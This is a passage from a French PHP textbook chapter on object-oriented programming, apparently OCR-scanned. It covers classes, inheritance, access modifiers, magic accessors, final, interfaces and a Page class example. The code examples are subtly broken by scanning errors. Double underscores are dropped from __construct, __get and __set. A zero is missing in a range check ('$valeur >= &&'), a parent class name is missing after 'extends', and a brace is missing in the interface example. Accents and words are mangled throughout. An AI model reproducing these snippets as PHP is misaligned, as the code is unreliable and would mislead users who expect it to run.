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propriete, tandis que le terme operation est utilise de maniere interchangeable avec le 
terme methode). 

Le principal avantage d'un logiciel oriente objet reside dans sa capacite a prendre en 
charge et a encourager V encapsulation, egalement appelee masquage de donnees. Pour 
l'essentiel, les donnees contenues dans un objet ne sont accessibles que par le biais des 
operations de celui-ci, qui forment V interface de l'objet. 

La fonctionnalite d'un objet est liee aux donnees qu'il utilise. Les details de l'imple- 
mentation d'un objet peuvent etre facilement modifies pour ameliorer les performances, 
ajouter de nouvelles caracteristiques ou corriger des bogues, sans qu 'il soit necessaire 
de changer I 'interface. Le fait de modifier cette interface peut, en effet, avoir des reper- 
cussions en cascade dans le projet, alors que 1' encapsulation vous permet d'effectuer 
des modifications et de realiser des corrections de bogues sans que vos actions ne se 
repercutent dans les autres parties du projet. 

Dans les autres secteurs du developpement logiciel, la POO s'est imposee comme la norme 
et le developpement oriente fonctions est desormais considere comme demode. Cepen- 
dant, pour diverses raisons, la plupart des scripts web restent malheureusement concus et 
dents avec une approche ad hoc, utilisant une methodologie orientee fonctions. 

Ce "retard" a plusieurs causes. Une majorite de projets web sont de petite taille et rela- 
tivement simples. Nul besoin d'elaborer un plan detaille pour construire une etagere 
avec une scie. De la meme maniere, la plupart des projets logiciels pour le Web peuvent 
etre realises de cette facon parce qu'ils sont de petite taille. En revanche, si vous prenez 
votre scie pour construire une maison sans avoir formellement planifie vos travaux, 
vous ne pourrez pas obtenir des resultats de qualite, si tant est que vous obteniez des 
resultats. II en va exactement de meme pour les projets logiciels importants. 

Nombre de projets web evoluent d'un ensemble de pages reliees entre elles par des 
hyperliens vers des applications complexes. Ces applications complexes, qu' elles 
soient presentees via des boites de dialogue et des fenetres ou via des pages HTML 
dynamiques, requierent une methodologie de developpement murement reflechie. 
L orientation objet peut aider a gerer la complexite des projets logiciels, a augmenter la 
reutilisabilite du code et, par consequent, a reduire les couts de maintenance. 

En POO, un objet est une collection unique et identifiable de donnees et d'operations 
agissant sur ces donnees. Par exemple, considerons le cas de deux objets representant 
des boutons. Meme si ces boutons portent tous deux l'intitule "OK", ont une largeur de 
60 pixels, une hauteur de 20 pixels et divers autres attributs identiques, nous devons 
pouvoir les distinguer et les manipuler separement l'un de 1' autre. D'un point de vue 
logiciel, cette distinction s'effectue via des variables separees, qui servent de descripteurs 
(d'identificateurs uniques) pour les objets. 
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Les objets peuvent etre regroupes en "classes". Une classe est un ensemble d'objets qui 
peuvent etre differents les uns des autres, mais qui ont certains points communs. Une 
classe contient des objets qui presentent tous des operations se comportant de la meme 
maniere et des attributs identiques representant les memes choses, bien que les valeurs 
de ces attributs puissent varier d'un objet a 1' autre au sein de la classe. 

Vous pouvez ainsi considerer le nom bicyclette comme celui d'une classe d'objets qui 
decrit les nombreuses bicyclettes distinctes qui presentent toutes des caracteristiques ou 
attributs communs, comme deux roues, une couleur et une taille, et des operations, 
comme le deplacement. 

Ma propre bicyclette pourrait ainsi etre considered comme un objet appartenant a la 
classe bicyclette. Elle a des caracteristiques identiques a toutes les bicyclettes, y 
compris l'operation de deplacement, qui est tout a fait comparable a l'operation de 
deplacement des autres bicyclettes, meme si elle n'est utilisee que tres rarement. Les 
attributs de ma bicyclette ont toutefois des valeurs qui leur sont propres ; par exemple, 
sa couleur est verte, ce qui n'est pas le cas de toutes les bicyclettes. 

Polymorphisme 

Un langage de programmation oriente objet doit prendre en charge le polymorphisme, 
qui signifie que differentes classes peuvent avoir des comportements differents pour la 
meme operation. Par exemple, supposez que nous ayons defmi une classe voiture et une 
classe bicyclette. Ces deux classes peuvent avoir des operations de deplacement diffe- 
rentes. Dans l'univers des objets reels, cette differentiation pose rarement probleme : il 
est peu probable en effet qu'une bicyclette soit confondue avec une voiture et demarree 
avec une operation de deplacement de voiture au lieu d'une operation de deplacement 
de bicyclette. En revanche, un langage de programmation ne possede pas le sens 
commun du monde reel : il doit par consequent disposer du polymorphisme pour qu'il 
soit possible de distinguer l'operation de deplacement appropriee a un objet particulier. 

Le polymorphisme est plus une caracteristique des comportements que des objets eux- 
memes. En PHP, seules les fonctions membres d'une classe peuvent etre polymor- 
phiques. Les verbes des langages naturels sont un peu l'equivalent dans le monde reel 
des fonctions membres d'une classe. Considerez la maniere dont peut etre utilisee une 
bicyclette dans la vie reelle. Vous pouvez la nettoyer, la deplacer, la demonter, la reparer 
ou la peindre, entre autres choses. 

Les verbes de cette derniere phrase decrivent des actions generiques parce que le type 
d'objet auquel ils peuvent etre appliques n'est pas precise (ce type d'abstraction concer- 
nant les objets et les actions est, du reste, l'une des caracteristiques distinctives de 
1' intelligence humaine). 
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Le emplacement d'une bicyclette, par exemple, exige des actions totalement differentes 
de celles requises pour deplacer une voiture, meme si les concepts sont similaires. Le 
verbe "deplacer" peut done etre associe a un ensemble particulier d' actions, mais 
uniquement apres que l'objet auquel il s'applique a ete defini. 

Heritage 

L heritage permet de creer une relation hierarchique entre les classes au moyen de sous- 
classes. Une sous-classe herite des attributs et des operations de sa superclasse. Les 
voitures et les bicyclettes ont, par exemple, des points communs et nous pourrions done 
definir une classe vehicule contenant des attributs comme la couleur et des operations 
comme le deplacement qui sont communs a tous les vehicules. II suffirait ensuite de 
laisser les classes voiture et bicyclette heriter de la classe vehicule. 

Les termes sous-classe, classe derivee et classe fille sont utilises de maniere interchan- 
geable. II en va de meme des termes superclasse, classe de base et classe parente. 

Grace au concept d'heritage, nous pouvons elaborer et enrichir l'ensemble des classes 
existantes. Apartir d'une simple classe de base, des classes plus complexes et plus 
specialisees peuvent etre creees au fur et a mesure des besoins. Cette approche rend le 
code plus reutilisable et constitue l'un des atouts indeniables de la programmation 
orientee objet. 

Exploiter la notion d'heritage peut permettre d'economiser du temps et des efforts de 
developpement lorsque des operations peuvent etre implementees une seule fois dans 
une superclasse, au lieu de l'etre a chaque fois dans des sous-classes separees. Cette 
approche favorise egalement une modelisation plus precise des relations du monde reel. 
Lorsque la phrase decrivant la relation entre deux classes peut contenir les mots "est un" 
ou "est une", alors, le concept d'heritage peut etre exploite. La phrase "une voiture est 
un vehicule", par exemple, est tout a fait sensee, tandis que la phrase "un vehicule est 
une voiture" n'est pas vraie dans le monde reel. Par consequent, les voitures peuvent 
heriter de la classe vehicule. 

Creation de classes, d'attributs et d'operations en PHP 

Jusqu'ici, la description que nous avons donnee des classes est plutot abstraite. Plus 
concretement, la creation d'une classe en PHP s'effectue au moyen du mot-cle class. 

Structure d'une classe 

La definition minimale d'une classe se formule de la maniere suivante : 

class nomclass { 
} 
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Pour qu'une classe ait une quelconque utilite, elle doit etre dotee d'attributs et d'opera- 
tions. Pour creer des attributs, il faut declarer des variables au sein d'une definition de 
classe en les precedant de mots-cles indiquant leur visibilite : public, private ou 
protected (ces mots-cles seront presentes plus loin dans ce chapitre). Le code qui suit 
cree une classe nomclasse dotee des deux attributs publics, $attribut1 et $attribut2 : 

class classname { 
public $attribut1 ; 
public $attribut2; 

} 

La creation d'operations dans une classe s'effectue en declarant des fonctions dans la 
definition de la classe. Le code suivant cree une classe nomclasse dotee de deux opera- 
tions qui n'effectuent rien de particulier. L operation operation () ne prend aucun 
parametre, tandis que operation2( ) attend deux parametres. 

class nomclasse { 

function operation1() {} 

function operation2($param1 , $param2) {} 

} 

Constructeurs 

La plupart des classes disposent d'un type special d'operation appele constructeur. Un 
constructeur est appele lors de la creation d'un objet et effectue generalement des taches 
d' initialisation comme 1' assignation de valeurs initiales aux attributs ou la creation 
d'autres objets necessaries a l'objet concerne. 

Un constructeur se declare de la meme maniere que les autres operations, sauf qu'il 
porte le nom special construct(). 

Bien qu'un constructeur puisse etre appele manuellement, son role principal est d'etre 
appele automatiquement a la creation d'un objet. Le code qui suit declare une classe 
dotee d'un constructeur : 

class nomclasse { 

function construct($param) { 

echo "Constructeur appele avec le parametre " . $param . "<br />"; 

} 

} 

Destructeurs 

L' oppose d'un constructeur est un destructeur. Les destructeurs permettent d'executer 
un traitement particulier juste avant qu'un objet ne soit detruit, ce qui aura lieu automa- 
tiquement lorsque toutes les references a cet objet ont ete indefinies ou hors de portee. 

Le destructeur d'une classe doit s'appeler destruct ( ) et ne peut prendre aucun para- 
metre. 
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Instanciation des classes 

Une fois que nous avons declare une classe, nous devons creer un objet (c'est-a-dire un 
individu particulier appartenant a la classe) avec lequel nous pourrons ensuite travailler. 
Cette drape s'appelle egalement creation d'une instance ou instanciation d'une classe. 
On cree un objet a l'aide du mot-cle new. II faut egalement preciser la classe dont l'objet 
sera 1' instance et fournir les parametres eventuellement requis par le constructeur de la 
classe. 

Le code qui suit declare une classe nomclasse avec un constructeur, puis cree trois 
objets de type nomclasse : 

class nomclasse { 

function construct($param) { 

echo "Constructeur appele avec le parametre " . $param ."<br />"; 

} 

} 

$a = new nomclasse( "Premier" ) ; 
$b = new nomclasse( "Second" ) ; 
$c = new nomclasse ( ) ; 

Le constructeur etant invoque a chaque creation d'objet, ce code produit le resultat 
suivant : 

Constructeur appele avec le parametre Premier 
Constructeur appele avec le parametre Second 
Constructeur appele avec le parametre 

Utilisation des attributs de classe 

A l'interieur d'une classe, vous avez acces a un pointeur special appele $this. Si un 
attribut de la classe courante porte le nom $attribut, vous pouvez le designer par 
$this >attribut lorsque vous l'initialisez ou que vous y accedez a partir d'une operation 
situee dans la classe. 

Le code qui suit illustre la definition et l'acces a un attribut a l'interieur d'une classe : 

class nomclasse { 
public $attribut; 
function operation ($param) { 

$this->attribut = $param 

echo $this->attribut; 

} 

} 

La possibility d'acceder a un attribut depuis l'exterieur de la classe est determinee par 
des modificateurs d' acces, comme vous le verrez dans la suite de ce chapitre. Cet exem- 
ple ne restreignant pas l'acces a l'attribut, vous pouvez y acceder depuis l'exterieur de 
la classe : 
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class nomclasse { 
public $attribut; 

} 

$a = new nomclasse( ) ; 
$a->attribut = "valeur"; 
echo $a->attribut; 

II est toutefois deconseille d'acceder directement aux attributs depuis l'exterieur d'une 
classe. L'un des interets de l'approche orientee objet reside justement dans le fait que 
1' encapsulation y est encouragee. 

Vous pouvez garantir cette encapsulation a l'aide des fonctions get et set. Au lieu 

d'acceder directement aux attributs d'une classe, vous pouvez ecrire des fonctions 
accesseurs de sorte a effectuer tous vos acces par le biais d'une seule section de code. 
Une fonction accesseur peut se formuler de la maniere suivante : 

class nomclasse { 
public $attribut; 

function get($nom) { 

return $this->$nom; 

} 

function set ($nom, $valeur) { 

$this->$nom = $valeur; 

} 

} 

Ce code se contente de fournir des fonctions minimales permettant d'acceder a l'attri- 

but $attribut. La fonction get ( ) renvoie simplement la valeur de $attribut, tandis 

que la fonction set ( ) affecte une nouvelle valeur a $attribut. 

Notez que get ( ) ne prend qu'un seul parametre - le nom d'un attribut - et renvoie la 

valeur de cet attribut. De maniere similaire, la fonction set ( ) prend deux parametres : 

le nom d'un attribut et la valeur que vous souhaitez lui donner. 

Ces fonctions ne s'appellent pas directement. Le double blanc souligne devant le nom 
indique que ces fonctions possedent une signification speciale en PHP, tout comme les 
fonctions construct ( ) et destruct ( ). 

Si vous instanciez la classe : 

$a = new nomclassef ) ; 

vous pouvez utiliser les fonctions get ( ) et set ( ) pour tester et modifier la valeur 

de n'importe quel attribut. 

Si vous tapez : 

$a->$attribut = 5; 

cette instruction appellera implicitement la fonction set ( ) avec la valeur $nom posi- 

tionnee a "attribut" et la valeur $valeur initialisee a 5. Si vous souhaitez effectuer 
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des controles sur les valeurs affectees a l'attribut, vous devez ecrire la fonction set ( ) 

en consequence. 

La fonction get ( ) fonctionne de maniere similaire. Dans votre code, si vous ecrivez : 

$a->attribut 

l'expression appellera implicitement la fonction get ( ) avec le parametre $nom posi- 

tionne a " att ribut " . C'est a vous d'ecrire la fonction get ( ) pour retourner la valeur 

de l'attribut. 

Au premier coup d'oeil, ce code peut sembler n'avoir que peu ou pas d'interet. Sous sa 
forme actuelle, c'est probablement le cas, mais il existe une raison simple de proposer 
des fonctions d'acces : vous n'aurez alors qu'une unique section de code qui accede a 
cet attribut particulier. 

Avec un seul point d'acces, vous pouvez implementer des controles de validite afin de 
vous assurer que les donnees stockees sont coherentes. Si vous jugez par la suite que la 
valeur de $att ribut doit etre comprise entre et 100, vous pouvez ajouter quelques 
lignes de code et operer la verification avant d'autoriser les modifications. Vous pourriez 
ainsi modifier la fonction set ( ) de la maniere suivante : 

function set ($nom, $valeur) { 

if( $nom == "attribut" && $valeur >= && $valeur <= 100 ) { 
$this->attribut = $valeur; 

} 

} 

Avec un unique point d'acces, vous etes libre de modifier 1' implementation sous-jacente. 
Si, pour une raison ou pour une autre, vous deviez modifier la maniere dont $att ribut 
est stocke, les fonctions accesseurs vous permettraient de le faire en ne modifiant le 
code qu'a un seul emplacement. 

II se peut que vous decidiez, au lieu de stacker $att ribut sous forme de variable, de le 
recuperer a partir d'une base de donnees selon les besoins, de calculer une nouvelle 
valeur a chaque fois qu'elle est requise, de deduire une valeur a partir de valeurs 
d'autres attributs ou d' encoder les donnees sous un type de donnees plus compact. 
Quelle que soit la modification que vous souhaitiez operer, il suffit de modifier les fonc- 
tions accesseurs. Les autres sections du code ne seront pas affectees, pour autant que 
vous faites en sorte que les fonctions accesseurs continuent d' accepter ou de renvoyer 
les donnees que les autres parties du programme s'attendent a pouvoir utiliser. 

Controler I'acces avec private et public 

PHP utilise des modificateurs d'acces qui controlent la visibilite des attributs et des 
methodes et qui sont places devant les declarations d' attribut et de methode. 
PHP dispose des trois modificateurs d'acces suivants : 
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■ L' option par defaut est public. Cela signifie que, si vous n'avez pas specific de 
modificateur d'acces pour un attribut ou une methode, ceux-ci seront publics. 
L'acces aux elements publics peut se faire depuis l'interieur ou l'exterieur de la 
classe. 

I Le modificateur d'acces private signifie qu'il n'est possible d'acceder a l'element 
marque que depuis l'interieur de la classe. Vous pouvez l'utiliser sur tous les attri- 

buts si vous n'utilisez pas get ( ) et set ( ) . Vous pouvez egalement choisir de 

rendre certaines methodes privees, par exemple s'il s'agit de fonctions utilitaires a 
utiliser a l'interieur de la classe uniquement. Les elements prives ne sont pas herites 
(nous y reviendrons dans la suite de ce chapitre). 

■ Le modificateur d'acces protected signifie que Ton ne peut acceder a l'element 
marque que depuis l'interieur de la classe. II existe egalement dans toutes les sous- 
classes. Nous reviendrons aussi sur cette question lorsque nous traiterons de l'heri- 
tage dans la suite de ce chapitre. Pour l'instant, considerez que protected est a mi- 
distance entre private et public. 

Le code suivant montre l'utilisation du modificateur public : 

class nomclasse { 
public $attribut; 

public function get($nom) { 

return $this->$nom; 

} 

public function set ($nom, $valeur) { 

$this->$nom = $valeur; 

} 

} 

Ici, chaque membre de classe est precede d'un modificateur d'acces qui indique s'il est 
prive ou public. Le mot-cle public peut etre omis car il s'agit du reglage par defaut, 
mais le code est plus simple a comprendre lorsque vous l'incluez, notamment si vous 
utilisez d'autres modificateurs. 

Appel des operations d'une classe 

Nous pouvons appeler une operation de classe en procedant de la meme maniere que 
pour un attribut de classe. Si nous declarons la classe suivante : 

class nomclasse { 

public function operation1() { } 

public function operation2($param1 , $param2) { } 

} 

et que nous creons un objet de type nomclasse, comme ici : 
$a = new nomclasse ( ) ; 
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nous pouvons appeler des operations en procedant de la meme facon que pour l'appel a 
d'autres fonctions : en specifiant leur nom, suivi des parametres requis, places entre 
parentheses. Ces operations appartenant a un objet, a la difference des fonctions norma- 
les, il est necessaire de preciser l'objet concerne. Le nom de cet objet est indique de la 
meme maniere que pour ses attributs : 

$a->operation1 ( ) ; 
$a->operation2(12, "test"); 

Si les operations renvoient des valeurs, elles peuvent etre recuperees de la maniere 
suivante : 

$x = $a->operation1 ( ) ; 

$y = $a->operation2(12, "test"); 

Implementation de I'heritage en PHP 

Une classe peut etre declaree comme etant une sous-classe d'une autre classe en utili- 
sant le mot-cle extends. Le code qui suit cree une classe B qui herite d'une classe A 
precedemment defmie : 

class B extends A { 
public $attribut2; 
public function operation2() { } 

} 

En admettant que la classe A ait ete declaree comme suit : 

class A { 

public $attribut1 ; 

public function operation1() { } 

} 

tous les acces suivants aux attributs et operations d'un objet de la classe B seraient 
corrects : 

$b = new B( ) ; 
$b->operation1 ( ) ; 
$b->attribut1 = 10; 
$b->operation2( ) ; 
$b->attribut2 = 10; 

Notez que, la classe B heritant de la classe A, nous pouvons faire reference a 
operationl ( ) et $attribut1 bien que ceux-ci soient declares dans la classe A. En tant 
que sous-classe de A, la classe B en possede les caracteristiques et les donnees. En outre, 
B a declare un attribut et une operation qui lui sont propres. 

Lheritage ne fonctionne que dans un sens. La sous-classe (la fille) herite de sa super- 
classe (le parent) mais le parent n'herite pas de son enfant. II s'ensuit que les deux 
dernieres lignes du code suivant sont incorrectes : 
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$a = new A( ) ; 
$a->operation1 ( ) ; 
$a->attribut1 = 10; 
$a->operation2( ) ; 
$a->attribut2 = 10; 

En effet, la classe A ne possede pas d'operation operation2( ) ni d'attribut attribut2. 



Controler la visibilite via I'heritage avec private et protected 

Les modificateurs d'acces private et protected permettent de controler I'heritage. Un 
attribut ou une methode declare private ne sera pas herite, alors qu'un attribut ou une 
methode declare protected ne sera pas visible en dehors de la classe (comme un element 
prive) mais sera herite. 

Considerez l'exemple suivant : 

<?php 
class A { 

private function operation1() { 
echo "Appel de operation " ; 

} 

protected function operation2() { 
echo "Appel de operation2"; 

} 

public function operation3() { 
echo "Appel de operation3"; 

} 

} 

class B extends A { 

function construct() { 

$this->operation1 ( ) ; 
$this->operation2( ) ; 
$this->operation3( ) ; 

} 

} 

$b = new B; 

?> 

Ce code cree une operation de chaque type dans la classe A : public, protected et 
private. B herite de A. Dans le constructeur de B, vous essayez done d'appeler des 
operations du parent. 

La ligne suivante : 

$this->operation1 ( ) ; 
produit une erreur fatale : 

Fatal error: Call to private method A: : operationl ( ) from context 'B' 
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Cet exemple montre que les operations privees ne peuvent pas etre appelees depuis une 
classe fille. 

Si vous mettez cette ligne en commentaire, vous remarquerez que les deux autres appels 
de fonction marchent bien. La fonction protected est heritee mais elle ne peut etre 
utilisee que depuis l'interieur de la classe fille, comme nous le faisons ici. Si vous 
essayez d'ajouter la ligne suivante : 

$b->operation2( ) ; 
en bas du fichier, vous obtenez l'erreur suivante : 

Fatal error: Call to protected method A: : operation2 ( ) from context '' 
En revanche, vous pouvez appeler operations ( ) depuis l'exterieur de la classe : 

$b->operation3( ) ; 
Cet appel est possible car la fonction est declaree public. 

Redefinition (overriding) 

Nous venons de voir le cas d'une sous-classe dans laquelle sont declares de nouveaux 
attributs et operations. II est egalement permis et parfois utile de redeclarer les memes 
attributs et operations. Une telle redeclaration, qualifiee de "redefinition" (overriding), 
permet en effet de donner a un attribut d'une sous-classe une valeur par defaut diffe- 
rente de celle du meme attribut dans la superclasse, ou bien encore de donner a une 
operation d'une sous-classe une fonctionnalite differente de la meme operation dans la 
superclasse. 

Par exemple, si nous disposons de la classe A suivante : 
class A { 

public $attribut = "Valeur par defaut"; 
public function operation() { 
echo "Quelque chose<br />"; 

echo 'La valeur de $attribut est ' . $this->attribut . "<br />"; 

} 

} 

et qu'il nous apparaisse necessaire de modifier la valeur par defaut de $attribut et de 
fournir une nouvelle fonctionnalite a operation ( ), nous pourrions creer la classe B en 
redefmissant $attribut et operation ( ) de la facon suivante : 

class B extends { 

public $attribut = "Valeur differente"; 

public function operation() { 

echo "Autre chose<br />"; 

echo 'La valeur de $attribut est ' . $this->attribut . "<br />"; 

} 

} 
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Declarer B n'affecte en rien la definition originale de A. Considerez les deux lignes de 
code suivantes : 

$a = new A( ) ; 

$a -> operation( ) ; 

Elles creent un objet de type A et appellent sa fonction operation ( ) . Le resultat obtenu 
a P execution de ces lignes est le suivant : 

Quelque chose 

La valeur de $attribut est Valeur par defaut 

Ce resultat montre bien que la creation de B n'a pas affecte A. Si nous creons un objet de 
type B, nous obtiendrons un resultat different. 

Les lignes suivantes : 

$b = new B( ) ; 

$b -> operationf ) ; 

produiront : 

Autre chose 

La valeur de $attribut est Valeur differente 

De la meme maniere que fournir de nouveaux attributs ou operations dans une sous- 
classe n'affecte pas la superclasse, la redefinition d'attributs ou d'operations dans une 
sous-classe n'affecte pas la superclasse. 

Une sous-classe herite de tous les attributs et operations non prives de sa superclasse, a 
moins que vous effectuiez des remplacements. Si vous fournissez une definition de 
remplacement, celle-ci devient preponderante et remplace la definition d'origine. 

Le mot-cle parent vous permet d'appeler la version originale de P operation dans la 
classe parente. Par exemple, pour appeler Poperation A: : operation depuis Pinterieur 
de la classe B, vous utiliseriez : 

parent: :operation() ; 

La sortie produite est cependant differente. Bien que vous appeliez Poperation depuis la 
classe parente, PHP utilise les valeurs d'attribut de la classe courante. Vous obtiendrez 
done la sortie suivante : 

Quelque chose 

La valeur de $attribut est Valeur differente 

L heritage peut etre implemente sur plusieurs niveaux. Par exemple, nous pourrions 
declarer une classe appelee C qui herite de B, e'est-a-dire qui herite a la fois des 
proprietes de B et de celles du parent de B, e'est-a-dire de A. Tout comme pour la classe B, 
nous serions libres de redefinir et de remplacer dans la classe C des attributs et operations 
des parents. 
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Empecher I'heritage et les redefinitions avec final 

PHP dispose du mot-cle final. Lorsque vous utilisez ce mot-cle devant une declaration 
de fonction, la fonction ne pourra plus etre redefinie dans aucune sous-classe. Vous 
pouvez par exemple l'ajouter a la classe A de l'exemple precedent : 

class A { 

public $attribut = "Valeur par defaut"; 
final function operation() { 
echo "Quelque chose<br />"; 

echo 'La valeur de $attribut est ' . $this->attribut . "<br />"; 

} 

} 

Cette approche vous empeche de redefinir operation () dans la classe B. Si vous 
essayez de le faire, vous obtenez l'erreur suivante : 

Fatal error: Cannot override final method A: : operation ( ) 

Vous pouvez egalement utiliser le mot-cle final pour empecher la creation de sous- 
classes a partir d'une classe. Pour empecher la creation de sous-classes a partir de la 
classe A, ajoutez le mot-cle de la maniere suivante : 

final class A { . . . } 

Si vous essayez ensuite d'heriter de A, vous obtiendrez une erreur comme celle-ci : 

Fatal error: Class B may not inherit from final class (A) 

Heritage multiple 

Quelques langages 00 (dont C++ et Smalltalk) prennent en charge I'heritage multiple 
mais, comme la plupart des autres, ce n'est pas le cas de PHP. II s'ensuit que chaque 
classe ne peut heriter que d'un seul parent. En revanche, aucune restriction n'impose 
une limite sur le nombre d'enfants que peut engendrer un meme parent. 

Les implications de cet etat de fait ne sont pas necessairement evidentes a premiere vue. 
La Figure 6.1 montre trois modes d'heritage differents. 
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Dans le mode le plus a gauche, la classe C herite de la classe B, qui herite a son tour de 
la classe A. Chaque classe possede au plus un parent : ce mode d'heritage unique est 
parfaitement valide en PHP. 

Dans le mode du centre, les classes B et C heritent toutes deux de la classe A. La encore, 
chaque classe possede au plus un parent : ce mode d'heritage unique est egalement valide 
en PHP 

Dans le mode le plus a droite, la classe C herite a la fois des classes A et B. Dans ce cas, 
la classe C possede deux parents : il s'agit la d'une situation d'heritage multiple, non 
supportee par PHP 

Implementation d'interfaces 

Si vous devez implementer une fonctionnalite analogue a 1' heritage multiple, vous 
pouvez le faire grace aux interfaces, qui sont un moyen de contourner 1' absence de 
l'heritage multiple. Leur implementation est semblable a celle des autres langages 
orientes objet, dont Java. 

Le principe d'une interface consiste a preciser un ensemble de fonctions qui devront etre 
implementees dans les classes qui implemented 1' interface. Par exemple, vous pourriez 
souhaiter qu'un ensemble de classes soient capables de s'afficher. Au lieu de creer une 
classe parente avec une fonction Afficher() dont heriteraient toutes les sous-classes et 
qu'elles redefmiraient, vous pouvez utiliser une interface de la maniere suivante : 

interface Affichable { 
function Afficher(){ 

} 

class pageWeb implements Affichable { 
function Afficher() { 
// ... 

} 

} 

Cet exemple presente une alternative a l'heritage multiple car la classe pageWeb peut 
heriter d'une seule classe et implementer une ou plusieurs interfaces. 

Si vous n'implementez pas les methodes specifiees dans l'interface (dans le cas present, 
Aff icher ( )), vous obtiendrez une erreur fatale. 

Conception de classes 

Maintenant que nous avons passe en revue les principaux concepts de l'approche orien- 
tee objet concernant les objets et les classes, ainsi que la syntaxe de leur implemen- 
tation en PHP, nous pouvons nous interesser a la conception de classes qui nous seront 
utiles. 
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Souvent, les classes implementees dans le code representent des classes ou des catego- 
ries d'objets reels. Dans le cadre d'un developpement web, les classes peuvent notam- 
ment servir a representer des pages web, des composants d'interface utilisateur, des 
paniers virtuels, des gestionnaires d'erreur, des categories de produits ou des clients. 

Les objets de votre code peuvent egalement representer des instances specifiques des 
classes enumerees plus haut, comme une page d'accueil, un bouton particulier ou le 
panier d' achat de Jean Dupont a un moment donne. Jean Dupont lui-meme pourrait 
d'ailleurs etre represente par un objet de type client. Chaque article achete par Jean peut 
etre represente sous la forme d'un objet, appartenant a une categorie ou a une classe. 

Dans le chapitre precedent, nous nous sommes servis de fichiers inclus pour donner une 
apparence coherente a toutes les pages du site de l'entreprise Active TLA Consulting. 
Une version plus elaboree de ce site pourrait etre obtenue en utilisant des classes et en 
exploitant le concept puissant d'heritage. 

Nous voulons maintenant pouvoir ajouter rapidement de nouvelles pages web au site de 
TLA, qui aient la meme presentation et un comportement similaire. Nous voulons 
toutefois etre en mesure de modifier ces pages pour les adapter aux differentes parties 
du site. 

Pour les besoins de cet exemple, nous allons creer une classe Page dont le role principal 
est de limiter la quantite de code HTML necessaire a la creation d'une nouvelle page. 
Cette classe devra nous permettre de modifier les sections qui changent d'une page a 
l' autre, tout en produisant automatiquement les elements communs a toutes les pages. 
La classe Page devra done fournir un cadre flexible pour la creation de nouvelles 
pages, sans compromettre notre liberte. 

Comme les pages seront produites a partir d'un script et non avec du code HTML statique, 
nous pouvons implementer diverses possibilites astucieuses : 

■ N'autoriser la modification d'elements de la page qu'en un emplacement seulement. 
Par exemple, s'il apparait necessaire de changer la declaration de copyright ou 
d' ajouter un bouton supplemental, nous ne devrions avoir a apporter la modification 
qu'en un seul point du code. 

■ Disposer d'un contenu par defaut pour la plupart des sections de la page, tout en 
gardant la possibilite de modifier chaque element si necessaire, de definir des 
valeurs personnalisees pour des elements tels que le titre et les metabalises. 

i Identifier la page en cours d'affichage dans le navigateur et modifier en consequence 
les elements de navigation (par exemple, un bouton permettant de retourner a la 
page de demarrage n'a pas lieu d'etre sur la page de demarrage). 
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■ Autoriser le remplacement d'elements standard dans des pages particulieres. Par 
exemple, pour implementer differents jeux de boutons dans differentes parties du 
site, nous devons etre en mesure de remplacer les boutons standard. 

Implementation d'une classe 

Une fois que le resultat vise et la fonctionnalite recherchee ont ete soigneusement dermis, 
nous pouvons nous attaquer a 1' implementation. 

La conception et la gestion de projets d'envergure sont traitees un peu plus loin dans cet 
ouvrage. Pour l'heure, nous nous limiterons aux aspects specifiques de l'ecriture d'un 
code oriente objet en PHP. 

Nous devons attribuer a notre classe un nom logique et explicite. La classe representant 
une page web, nous l'appellerons simplement Page. Pour declarer une classe nommee 
Page, il suffit d'ecrire : 

class Page { 
} 

Notre classe doit contenir des attributs. Nous definirons comme attributs de la classe 
Page les elements appeles a changer d'une page a 1' autre. Nous appellerons $contenu le 
contenu principal de la page, qui sera une combinaison de balises HTML et de texte. 
$contenu peut etre declare dans la definition de la classe par la ligne de code suivante : 

public $contenu; 

Nous pouvons egalement definir des attributs pour stacker le titre de la page. Pour que 
les visiteurs du site identifient clairement la page consultee, ce titre changera d'une 
page a 1' autre. Pour eviter l'affichage de titres vides, nous definirons un titre par defaut : 

public $titre = "TLA Consulting Pty Ltd"; 

La plupart des pages web des sites commerciaux contiennent des metabalises destinees 
a aider les moteurs de recherche dans leur indexation. Pour que ces metabalises soient 
utiles, elles doivent changer d'une page a 1' autre. La encore, nous fournirons une valeur 
par defaut: 

public $mots_cles = "TLA Consulting, Three Letter Abbreviation, 
les moteurs de recherche sont mes amis"; 

Les boutons de navigation montres sur la page modele de la Figure 5.2 (voir le chapitre 
precedent) resteront probablement identiques d'une page a 1' autre afin de ne pas semer 
la confusion dans l'esprit du visiteur. Toutefois, pour faciliter la modification de ces 
boutons, nous les implementerons egalement sous la forme d' attributs. Le nombre de 
boutons pouvant etre appele a changer, nous utiliserons un tableau dans lequel nous 
stockerons a la fois l'intitule du bouton et l'URL pointee. 
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public $boutons = array( "Accueil" => "acceuil.php" , 
"Contacts" => "contacts. php" , 
"Services" => "services. php" , 
"Carte du site" => "carte. php" 

); 

Pour que la classe Page fournisse des fonctionnalites, nous devons la munir d'opera- 
tions. Pour commencer, nous pouvons lui ajouter des fonctions accesseurs qui nous 
permettront de definir et de recuperer la valeur des attributs que nous venons de creer : 

public function set($nom, $valeur) 

{ 

$this->$nom = $valeur; 

} 

La fonction set( ) ne contient pas de verification d'erreur (par souci de concision), 

mais cette fonctionnalite peut aisement etre ajoutee par la suite, en fonction des 
besoins. Comme il est peu probable que vous ayez besoin de recuperer l'une de ces 
valeurs depuis l'exterieur de la classe, vous pouvez deliberement ne pas fournir de 

fonction get ( ) ; c'est ce que nous faisons ici. La classe Page visant principalement a 

afficher une page HTML, nous devons implementer une fonction a cette fin, que nous 
appelons Af f icher ( ) : 

public function Afficher() { 
echo "<html>\n<head>\n" ; 
$this -> AfficherTitre( ) ; 
$this -> AfficherMotsCles() ; 
$this -> AfficherStyles( ) ; 
echo "</head>\n<body>\n" ; 
$this -> AfficherEntete( ) ; 
$this -> AfficherMenu($this->boutons) ; 
echo $this->contenu; 
$this -> AfficherPied( ) ; 
echo "</body>\n</html>\n" ; 

} 

Outre quelques instructions echo simple qui affichent le texte HTML, cette fonction 
comprend essentiellement des appels a d'autres fonctions de la classe. Comme le lais- 
sent deviner leurs noms, ces autres fonctions affichent des parties distinctes de la page. 

Un tel decoupage en fonctions n'est pas indispensable et nous aurions tres bien pu 
combiner ces differentes fonctions en une seule. Nous avons toutefois choisi ce decou- 
page pour diverses raisons. 

Chaque fonction doit, en principe, accomplir une tache bien dermic Plus la tache est 
simple, plus la fonction est facile a tester. Ne poussez toutefois pas cette modularisation 
trop loin : un programme morcele en trop d'unites risque d'etre difficile a lire. 

